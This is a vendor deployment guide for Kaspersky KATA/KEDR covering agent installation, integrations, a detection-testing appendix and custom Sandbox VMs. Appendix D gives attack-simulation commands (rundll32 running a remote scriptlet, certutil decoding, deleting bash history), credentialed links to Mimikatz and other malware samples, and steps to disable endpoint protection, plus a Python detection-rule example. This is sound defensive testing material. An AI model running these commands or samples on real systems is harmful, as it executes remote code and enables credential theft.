2.3.19. In the Server address field specify the IP address of the KATA Central Node, then click OK.

2.3.20. Optional, but strongly recommended: in the Advanced connection security section check Secure connection with client certificate and upload the client certificate (agent_cert_xxxx.pfx) downloaded at step 2.3.4.
You will see the Client certificate successfully uploaded status. Together with Validate Endpoint Agent TLS certificates on the Central Node (step 2.3.4) this gives mutual TLS: the node also rejects agents that cannot present this certificate.


2.3.21. Change any additional KATA integration settings if needed and save the changes by clicking OK.

2.3.22. Change any additional application settings if needed and save the changes.
Optional, but recommended: set password protection in the security settings so that the agent cannot be stopped or removed locally without it.


2.3.23. Open the Central Node web console as an Administrator and check that the Endpoint Agents appear there correctly.


2.4 INSTALLING KES WITH BUILT-IN EDR AGENT ON THE APPLE MACOS
PLATFORM
To deploy the EDR solution on macOS, follow the steps below:

1) Install Kaspersky Network Agent for Mac.
2) Prepare an EDR-only Kaspersky Endpoint Security 12 for Mac installation package.
(If the fully fledged EPP is required, the default package available on the public download site can be used.)
3) Create the deployment task.
4) Create and install the solution policy.

Network Agent and KES for Mac installation steps:

Kaspersky Network Agent and KES for Mac can be deployed in several ways:

a) Locally, using the distribution kit downloaded from the Kaspersky website.
b) Remotely, using Apple Remote Desktop.
c) Remotely, via KSC.

Note: to keep things simple, the following steps describe local installation of the Network Agent and a remote installation task in KSC to deploy KES for macOS.

1. Download the Network Agent installation package on a target Mac device from
https://www.kaspersky.com/small-to-medium-business-security/downloads/endpoint

2. In the message box that appears, click Allow.


3. On the Welcome to the Network Agent Installer screen click Continue.

4. On the Software License Agreement screen click Continue.

5. Agree to the terms of the software license agreement.

6. Specify the address of the Kaspersky Security Center Administration Server.


7. Click Install and enter the administrator's password.

8. Close the Wizard and move the Network Agent installer to the Bin if necessary.

Network Agent for Mac is now installed, and Kaspersky applications on this device can be managed from Kaspersky Security Center. Let's proceed with the remote installation of Kaspersky Endpoint Security for macOS.

Note: Before installing Kaspersky Endpoint Security remotely, we recommend that you download the
KES_for_macOS11_and_later.zip archive from Kaspersky Technical Support website and apply the
KES_for_macOS11_and_later_profile.mobileconfig configuration profile on the client computer using Apple Remote
Management tools. This will allow Kaspersky Endpoint Security to get the following: permissions to install the kernel
extension and the system extension, full disk access, and permissions to configure network connections. To learn
more about the configuration profile and other options, visit the Technical Support website.

For evaluation purposes we will allow the required permissions manually on a target device.

9. Switch to the Kaspersky Security Center Web Console.
Go to DISCOVERY & DEPLOYMENT -> UNASSIGNED DEVICES.
In the right pane select the target Mac device with the Network Agent and click Move to group.
Select a destination group and click Move.


10. To activate the minimum EPP features of the deployed solution, go to Discovery & Deployment -> Deployment & Assignment -> Installation packages.
Click the +Add button -> Create an installation package for a Kaspersky application.
Locate the required KES 12 package and download it.

11. In the list of downloaded installation packages, check the one you have downloaded and open its settings to select only the Endpoint Detection and Response feature.

12. Go to DEVICES -> TASKS, then click +Add.


13. In the task parameters select and specify the following:
Application: Kaspersky Security Center 14.2
Task type: Install application remotely
Task name: Install KES for Mac
Select devices to which the task will be assigned: specify device addresses manually or import addresses from a list.

14. Select the devices where Network Agent for Mac has been installed.

15. On this page specify the following:
Select installation package: Kaspersky Endpoint Security for Mac 12.0.0
Leave all other settings at their defaults.

16. Select Do not restart the device.

17. Select No account required (Network Agent installed).

18. Close the Wizard.

19. Select the created task and click Start.

20. Wait a few minutes, then select the created task and click Result. Check that the task has completed.

To finish the Kaspersky Endpoint Security for Mac installation it is necessary to allow the required permissions on the target macOS device.

After KES with EDR functionality is installed, follow the standard procedures to grant it system permissions and activate a license.

Now it is time to create and install the EDR policy on the managed macOS devices.

21. Select the administration group that contains the required client computer.
In the workspace, select the Policies tab and click New policy. The New policy wizard opens.
In the Select the application for which you want to create a group policy window, in the list of applications, select Kaspersky Endpoint Security for Mac (12.0).

22. Go to Application settings -> Detection and Response -> Endpoint Detection and Response (KATA) and do the following:
• Enable Endpoint Detection and Response (KATA).
• Configure the server connection settings and add the TLS certificate (kata.crt from step 2.3.4).
• Add the KATA server address.

Save and install policy.

23. Go to the KATA Central Node Web UI and wait until the EDR agent has connected to the Central Node.


CONCLUSION
This concludes the installation of the KATA/KEDR 6.0 commercial release. You now know how to install KATA.
This simplified guide is intended to enable a quick evaluation of the product features, using a narrow scope of work.
It does not replace the Product Documentation.


APPENDIX A: KPSN INTEGRATION
KATA can be integrated with Kaspersky Private Security Network (KPSN).
Configuration files are obtained from HQ after configuration.json has been provided.
Configuration files (the file names differ depending on the installation): kc_<some_name>.xml, kh_<some_name>.xml, klcli_<some_name>.dat
Files used during integration can be downloaded from the following link:
https://confluence.kaspersky.com/display/KAT/KPSN+integration
To integrate KATA and KPSN, follow these steps:

1. Place squeeze.exe, kc_<some_name>.xml and kh_<some_name>.xml in the same folder.

2. Run cmd as administrator.

3. Execute the following command: squeeze.exe kc_<some_name>.xml kc_private.xms

4. Execute the following command: squeeze.exe kh_<some_name>.xml kh_private.xms

5. Rename the .dat file obtained from HQ to ksncli_private.dat


6. Open the Central Node web interface ->
<Settings> -> <Participation in KSN/KPSN>. Select
<KPSN> and upload the files generated during the
previous steps.

7. Optionally: the following steps enable you to publish KATA detects in KPSN.
Open the KPSN web console.
Click <kpsn_admin> -> <My profile> -> <Client certificate>.

8. Download the client certificate; the crt and key files are in the downloaded archive.

9. Open the KATA web console: Settings -> <KPSN reputation database>.
Enter the KPSN IP address or DNS name.
Upload the crt and key files downloaded from KPSN.


APPENDIX B: KASPERSKY SECURITY FOR MAIL
GATEWAY (KSMG) INTEGRATION
1. Open the KSMG web interface -> <Settings> -> <Protection>.

2. Enable KATA Integration and set the Central Node's IP address and port.

3. Log in to the Central Node web interface as Administrator, open the <External systems> tab and <Accept> the connection.

4. Check the KATA connection state in the KSMG web interface and click <Close>.


APPENDIX C: KASPERSKY WEB TRAFFIC SECURITY
(KWTS) INTEGRATION
1. Open the KWTS web interface -> <Settings> -> <External Services> -> <KATA Integration>.

2. Add a KATA server, set the Central Node's IP address and port, and click <Next>.

3. Confirm the KATA server: compare the SHA256 fingerprint shown with the fingerprint of the Central Node certificate you exported (kata.crt) before clicking <Confirm>. Accepting an unverified fingerprint would let an attacker positioned between KWTS and the Central Node pass off their own certificate.

4. Log in to the Central Node web interface as Administrator, open the <External systems> tab and <Accept> the connection.


APPENDIX D: KATA/KEDR TESTING
1. Testing the operation of key KATA/EDR detection engines.

1.1. Network traffic is analyzed using the Anti-Malware Engine

Preconditions:
• The Anti-Malware engine is in the active state and its databases are updated. The SPAN sensor is configured.
• KES advanced protection modules should be disabled (otherwise the endpoint blocks the download before the test object is ever seen in traffic).

Step 1. Download the EICAR file from https://support.kaspersky.com/common/diagnostics/7399 (choose the download via http). The SPAN sensor only inspects plaintext traffic, so a download over https would not produce a network alert.
Expected result: the file is downloaded onto the workstation.
Step 2. Check that alert information has appeared in the KATA console.
Expected result: Anti-Malware engine alert.

Example of the alert:

Example of the alert details:



1.2 Network traffic is analyzed using the Anti-Malware Engine and Sandbox components.

Preconditions:
• The Anti-Malware engine is active, databases are updated, the SPAN sensor is configured.
• The Sandbox component is installed and in the active state, and VM (Virtual Machine) images have been uploaded.
• KES advanced protection modules should be disabled.

1.2.1 Mimikatz Sample
Step 1. Download the Mimikatz credential-harvesting software from
ftp://data100-ro:[email protected]
labs.com/mimikatz_x64.rar
Expected result: an archive is downloaded onto the workstation.
Step 2. Check that alert information on Mimikatz has appeared in the KATA console.
Expected result: Anti-Malware engine alert. Note: a Sandbox alert will also appear in the console after the sample execution has completed.

Example of the alert:

Example of the alert details:



1.2.2 Reprt Sample
Step 1. Download the sample from
ftp://data100-ro:[email protected]
labs.com/katatestfile/reprt.rar
Expected result: the object is downloaded onto the workstation.
Step 2. Check that Sandbox alert information has appeared in the KATA console.
Expected result: a Sandbox alert is available in the console after the sample execution has completed.

Example of the alert:

Example of the Sandbox scan result:



1.3. Domains are analyzed using the URL reputation component and the KSN system.

Preconditions:
• The KSN system is accessible.
Step 1. Open the http://bug.qainfo.ru/test/wmuf_w link in the web browser.
Expected result: the malicious domain is requested by the user. Note: if the request is blocked by the endpoint protection tool, temporarily disable the anti-malware tool.
Step 2. Check that alert information on the malicious URL has appeared in the KATA console.
Expected result: a Malicious host verdict and additional details are presented in the console (this URL is in the KSN list).

Example of the alert:

Example of the alert details:



1.4. Detection using the Indicator of Attack (IOA) mechanism

1.4.1 Rundll32 executes a JavaScript remote payload with GetObject

Test the execution of a remote script via rundll32.exe (MITRE ATT&CK T1218.011). On execution, notepad.exe is opened.
Open the command prompt and run the following command (admin rights needed):
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct").Exec();

Note: to run the command you need to disable the KES advanced protection modules, which would otherwise block it on the endpoint before the Central Node sees it.

Check that the corresponding TAA alert information has appeared in the KATA Web console.

1.4.2 Deobfuscate/Decode Files or Information

Open the command prompt and run the following commands (MITRE ATT&CK T1140; certutil is abused as a base64 encoder/decoder):
certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe

Check that the corresponding TAA alert information has appeared in the KATA Web console.

Detailed information on the incident (connections, processes, launch parameters etc.) is presented below:

1.5. Testing NTA

1.5.1 Network scanning

Perform network scanning using Nmap or a similar tool to obtain alerts from the KATA Intrusion Detection engine.

Example of the alert:

Example of the alert details:



1.5.2 DNS request to malicious domain
In the command prompt on a workstation run: nslookup bandtester.com

Example of the alert:

Example of the alert details:



1.5.3 NFS traffic analysis
Scenario: malicious communication is established from the customer's network to the attacker's C2 (command and control) server. Steps 3-4 simulate the attacker's activity. (We assume that the attacker has already gained access to a system in our network; note also that the malicious activity is only replicated here by replaying previously recorded traffic.)

Step 1. Prepare a Kali Linux machine. Make sure that traffic from the Kali Linux machine reaches a KATA SPAN port.
Expected result: the Kali Linux machine is prepared.
Step 2. Download the sample to the Kali Linux machine:
https://box.kaspersky.com/f/7b29cad5c5ec477a8e08/
Pass: Ky5.7NCqKAXN~Ix_
Expected result: the PCAP file is downloaded.
Step 3. Start a terminal session if not already started and go to the folder with the downloaded PCAP file, for example: cd ~/tcpreplay
Step 4. Run the following command: sudo tcpreplay -i eth0 traffic_NFS_test.pcap
Then wait for the command to complete (takes a few minutes). Use the interface whose traffic is mirrored to the SPAN port if it is not eth0.
Expected result: the command execution is complete.
Step 5. Go to the KATA CN Web UI as the sso user. You should see 2 new alerts (1 IDS and 1 AM/SB alert). Explore them.

Step 6. Open the IDS alert; in the payload find the "EELFLVWIGFUAXFTL" string and copy the hex values to the left of it. Save them for later.

Step 7. Go to the Sensor servers tab -> localhost and press "Download traffic".

Step 8. Specify host <IP of the Kali Linux machine> (for example: host 10.69.135.106) in the Filtering rule field. As the time interval for the traffic download, specify the last hour (usually the default). Then press "Download".

Step 9. Double-click the downloaded traffic dump to open it in Wireshark. Open the Find Packet dialog, select Hex value as the search type in the upper left of the dialog, then search for the hex value you previously obtained from the KATA IDS alert.

Step 10. By scrolling up and reviewing the packets you can see that there was in fact an NFS file transfer session between the compromised system (10.69.135.106) and the attacker's C2 server (10.69.135.101).


1.6 Testing TAA rule autosandboxing

Step 1. Download the archive with the sample from
https://box.kaspersky.com/f/ec3b0b023d1a4356bf42/?dl=1
Pass: Fx6*HZB}q1wMI)#W
Expected result: the archive auto-submission-sample-infected-c9654daddad1141a317fc88582d5a537.zip is downloaded onto the workstation.
Step 2. Unpack the archive and change the extension of the sample to .exe.
Expected result: the sample is unpacked and named c9654daddad1141a317fc88582d5a537.exe
Step 3. Run the sample.
Expected result: a Sandbox alert is available in the console after the sample execution has completed.

Example of the alert:

Example of the alert details:

1.7 Testing a TAA rule on Linux

Step 1. On the victim Linux machine with the EDR agent installed, run the following command:
$ rm ./.bash_history

Step 2. Go to the KATA Web UI with Senior Security Officer privileges and open the "Alerts" tab.
Expected result: you see the "deleting_or_renaming_bash_history_log_linux" alert.

Step 3. Open the alert card.

Step 4. Search related events.

Step 5. Open the event card to see the details and explore the process tree.
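As an added example (not from the guide, and not Kaspersky's TAA rule logic), the following Python code runs three approximate detection rules, one per IOA test above (1.4.1 rundll32 with a remote GetObject scriptlet, 1.4.2 certutil encode/decode, 1.7 deletion of .bash_history), over constructed process-creation telemetry. It shows what each test command looks like as a telemetry event and why the benign look-alikes in the sample must not fire. The Event fields, the sample hosts and the rule names other than the Linux alert name quoted above are assumptions.

```python
"""Added example (not from the guide, not Kaspersky's TAA rules): approximate
command-line detections for the three IOA tests in this appendix, run over
constructed process-creation telemetry. Event fields, hosts and rule names
(except the Linux alert name the guide shows) are assumptions."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Event:
    host: str
    os: str        # "windows" or "linux"
    image: str     # full path of the process image
    cmdline: str
    parent: str = ""


@dataclass
class Rule:
    name: str
    technique: str   # MITRE ATT&CK technique the rule approximates
    os: str
    match: Callable[[Event], bool]


def image_name(e: Event) -> str:
    """Basename of the image, lower-cased, for either path separator."""
    return e.image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def rundll32_remote_script(e: Event) -> bool:
    # 1.4.1 / T1218.011: rundll32 loading mshtml's RunHTMLApplication with a
    # javascript: URL that pulls a remote scriptlet via GetObject("script:...")
    c = e.cmdline.lower()
    return (image_name(e) == "rundll32.exe"
            and "javascript:" in c
            and "runhtmlapplication" in c
            and re.search(r'getobject\(\s*["\']script:https?://', c) is not None)


def certutil_encode_decode(e: Event) -> bool:
    # 1.4.2 / T1140: certutil used as a base64 codec or downloader instead of
    # for certificate management
    c = e.cmdline.lower()
    return (image_name(e) == "certutil.exe"
            and re.search(r"\s-(encode|decode|urlcache|verifyctl)\b", c) is not None)


def bash_history_tamper(e: Event) -> bool:
    # 1.7 / T1070.003: deleting, renaming or truncating the shell history file
    touches_history = re.search(r"(^|[\s/])\.bash_history(\s|$)", e.cmdline) is not None
    return image_name(e) in {"rm", "mv", "shred", "unlink", "truncate"} and touches_history


RULES: List[Rule] = [
    Rule("rundll32_javascript_remote_payload", "T1218.011", "windows", rundll32_remote_script),
    Rule("certutil_deobfuscate_decode", "T1140", "windows", certutil_encode_decode),
    Rule("deleting_or_renaming_bash_history_log_linux", "T1070.003", "linux", bash_history_tamper),
]


def detect(events: List[Event], rules: List[Rule] = RULES) -> Dict[str, List[str]]:
    """Return {rule_name: [host, ...]} for every rule that fired, one entry per event."""
    hits: Dict[str, List[str]] = {}
    for e in events:
        for r in rules:
            if r.os == e.os and r.match(e):
                hits.setdefault(r.name, []).append(e.host)
    return hits


# Constructed telemetry: the three guide commands plus benign look-alikes that
# must NOT fire (certutil used for its real purpose, an ordinary file deletion).
SAMPLE_EVENTS: List[Event] = [
    Event("WS01", "windows", r"C:\Windows\System32\rundll32.exe",
          'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'
          'GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/'
          'master/atomics/T1218.011/src/T1218.011.sct").Exec();', parent="cmd.exe"),
    Event("WS01", "windows", r"C:\Windows\System32\certutil.exe",
          r"certutil -encode C:\Windows\System32\calc.exe C:\Users\u\AppData\Local\Temp\T1140_calc.txt",
          parent="cmd.exe"),
    Event("WS01", "windows", r"C:\Windows\System32\certutil.exe",
          r"certutil -decode C:\Users\u\AppData\Local\Temp\T1140_calc.txt "
          r"C:\Users\u\AppData\Local\Temp\T1140_calc_decoded.exe", parent="cmd.exe"),
    Event("WS02", "windows", r"C:\Windows\System32\certutil.exe", "certutil -store My"),  # benign
    Event("LNX01", "linux", "/usr/bin/rm", "rm ./.bash_history", parent="bash"),
    Event("LNX01", "linux", "/usr/bin/rm", "rm ./build.log", parent="bash"),  # benign
]


if __name__ == "__main__":
    for name, hosts in detect(SAMPLE_EVENTS).items():
        print(f"{name}: fired on {hosts}")
```

Command-line matching like this is easy to evade (renaming certutil.exe, quoting tricks, clearing history with `history -c` or a redirect instead of rm), which is why the real TAA rules also lean on process lineage, file and network telemetry; the point here is to see exactly which observable each test in this appendix produces.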



APPENDIX E: ENDPOINT AGENT INSTALLATION AND
CONFIGURATION USING KSC MMC UI
1. Log in to the KATA CN as an Administrator.
Open <Settings> -> <Certificates> and download the Server Certificate (kata.crt).
Optionally: for additional host-based security, generate the Endpoint Agent certificate (it will be downloaded automatically) and enable <Validate Endpoint Agent TLS certificates>.

2. Open KSC.

3. Create the KEA installation package:
<Advanced> -> <Remote installation> -> <Installation packages> -> <Create installation package>.


4. Select <Create an installation package for a Kaspersky product> and set a name for this installation package.
Then specify the path to the endpointagent.kud file.

5. Accept the EULA and privacy terms, then click <Next>.
Once the package has been created, click <Finish>.

6. The next step is to install KEA:
Go to <Tasks> -> <New task> -> <Install Application Remotely>.


7. Select <Kaspersky Endpoint Agent_3.12>.

8. Install the Network Agent if it is not already installed, using the New Task Wizard. Answer the questions, finish and run this task.

9. Wait until the task has completed successfully.


10. The next step is to create your policy.
Select the devices group and in the New Policy
Wizard select <Kaspersky Endpoint Agent>.
Click on <Next> and then <Next> again on the
following screen.

11. Check the <KATA EDR> option and click on <Next>.

12. This page enables you to configure the connection between KEA and the KATA Central Node.
Click <Configure> and then check <Enable KATA integration>.
Specify the IP address and check <Use pinned certificate to secure connection>.


13. Select the <kata.crt> certificate you downloaded
at Step 2.3.4 above.

14. Optional: click <Add client certificate> and upload the client certificate which you downloaded at Step 2.3.4 above.

15. Click <Ok> and then <Next>.
Optional: change the device isolation terms and user notification settings.
Click <Next>.


16. Optional: configure the quarantine and synchronization options.
Click <Next>.

17. Optional: configure the application security settings.
We recommend that you apply password protection.
Click <Next>.


18. Optional: Specify proxy parameters.

Click <Next>.

19. Select this policy as <Active>.

Click <Next>.

20. Wait while the policy is applied to the managed hosts.


21. The next step is to upload the KEDR license:
Go to <Kaspersky Licenses> -> <Add activation code or key file> and click <Next> through the wizard.

22. Open the license key and check the <Automatically distributed license key> option.

23. Open the Central Node web console as an Administrator and check that the Endpoint Agents appear there correctly.


APPENDIX F: INSTALLING KASPERSKY ENDPOINT AGENT
FOR LINUX
Kaspersky Endpoint Agent for Linux is installed on individual devices in the organization's IT infrastructure that run a supported Linux operating system. The application continuously monitors the processes running on these devices, open network connections and the files being modified. Kaspersky Endpoint Agent for Linux is also known as LENA (Linux ENdpoint Agent). Before installing LENA on a device, verify that the device complies with the hardware and software requirements: https://support.kaspersky.com/help/KATA/5.1/en-US/247944.htm

LENA can be installed using a remote installation. This guide describes the remote installation of LENA using
Kaspersky Security Center Web Console.

The installation consists of the following steps:

• Preparing;

• Creating the installation package;

• Creating the remote installation task;

• Creating and installing the policy.

Preparing for the LENA installation

1. Make sure the Kaspersky Endpoint Agent Management web plug-in has already been installed on the KSC Web Console. If not, install it:
https://support.kaspersky.com/help/MDR/KEALinux/en-US/200778.htm
2. Make sure the Kaspersky Security Center Network Agent has been installed on the device. If not, install it. For more details:
• Network Agent local installation:
https://support.kaspersky.com/help/KES4Linux/11.3.0/en-US/198105.htm
• Network Agent remote installation:
https://support.kaspersky.com/help/KSC/14.2/en-US/137593.htm

3. Make sure you have the kata.crt and agent_cert_xxxx.pfx files. If not, see step 2.3.4.

Creating the installation package

4. Download the zip file of the Kaspersky Endpoint Agent for Linux.

5. Go to the KSC Web Console and create the KEA installation package:
Deployment & Assignment -> Installation Packages -> + Add.

6. Select Create an installation package from a file, then click Next.
Set a name for this installation package.
Click Browse, select the downloaded zip file (from klbox) and click Open.
Then click Next.

7. To accept the EULA and Privacy Policy, scroll down to the bottom, tick I accept the Privacy Policy and accept the EULA, then click Next -> OK.

Creating the remote installation task

8. The next step is to install KEA: go to Devices -> Tasks -> Add.


9. Set the new task properties:
• Application: Kaspersky Security Center 14
• Task type: Install application remotely
• Task name: your choice
Assign the task according to the deployment scenario agreed for the PoC and click Next.
NOTE: in this guide we use manual selection of the hosts on which to install KEA.

10. Choose the devices on which to install KEA: click Add, tick the selected devices, then click Next.


11. Choose the installation package and the Network Agent.
Check Using Network Agent and click Next. Answer the remaining questions and select the user accounts used to access the target systems.
Click Finish to complete creating the task.


12. Go to Devices -> Tasks. Select your task and click Start.

13. Wait until the task has successfully completed.

Creating and installing the policy

14. Perform steps 2.3.14-2.3.22 to create and install the policy.

15. Open the KATA Central Node web console as an Administrator and check that the Endpoint Agents appear there correctly.


APPENDIX G: CUSTOM VM CREATION
In some cases, it might be required to create a VM with a custom OS for your demo or PoC. Custom images of OSs
and applications are placed in the Storage section of the Sandbox web UI.

You can upload the following custom operating system images to the Storage (uploaded files must have the .ISO
extension):

• Windows XP

• Windows 7

• Windows 8.1 64-bit

• Windows 10 64-bit (up to version 1909)

1. Open the web interface of the KATA Sandbox, go to Templates & Storage -> Storage and upload the OS installation image for your custom VM.

2. Go to Templates & Storage -> Templates and select Add -> Create Template in the upper right corner of the page.

3. Specify the name and description. Choose the previously uploaded iso image for your custom VM template. Click Proceed.


4. The template boots from the installation iso; complete the installation like a normal OS and activate your OS.

5. Configure your OS according to https://support.kaspersky.com/help/KATA/6.0/en-US/248892.htm and install additional software if required. You can upload additional iso files with your software to the Storage section as described in step 1 and later mount them by selecting the "Mount iso" option at the top of the VNC window for template customization.

6. Shut down the OS when you have finished your OS preparation and customization.

7. Select the Create VM option in the upper right corner.

8. Specify a name and, optionally, a description for your VM. Then click Save.


9. Wait for the VM to be created.

10. If you have not configured the malware interface for your KATA SB, you will be presented with a request to obtain the debug symbols. Press the Download manifest button on the No internet access pop-up.
If no pop-up appeared, skip to step 18.

11. Inside the downloaded archive there is a PowerShell script for downloading and generating debug symbols. On the system where you will launch this script, install Debugging Tools for Windows (it can be installed from the Windows SDK installer).

12. Unzip the archive obtained in step 10. Launch the sbsymtool script from a PowerShell session with admin permissions.


13. The symbols.zip file is generated after the script has run.

14. In the KATA SB Web UI, on the template page select Actions -> Upload Symbols and select the symbols.zip obtained in the previous step.

15. Select the Create VM option again.

16. Specify the VM name and (optionally) the description again, then press Save.

17. Wait for the VM creation to finish.

18. When requested by the wizard, proceed to the Virtual machines page of the KATA Sandbox UI.


19. On the "Virtual machines" page press "Install" for your VM. Wait for the VM installation to complete.

20. After the VM installation has completed, press "Enable" for your VM on the "Virtual machines" page.

21. After your VM has been enabled, wait about 10 minutes. Then open the KATA CN web UI as Administrator and go to Sandbox settings -> Settings. Select OS set as Custom and in VM composition tick your VM (it will have the "Custom" label). If you want, you can disable the default VMs by deselecting them.

22. If you have enabled multiple VMs (multiple custom VMs, or custom VMs mixed with default ones), in the KATA CN web UI go to Custom rules -> Sandbox and create a rule (or multiple rules) whose conditions define which files are sent to your custom VM for analysis.
See https://support.kaspersky.com/help/KATA/6.0/en-US/246747.htm for details.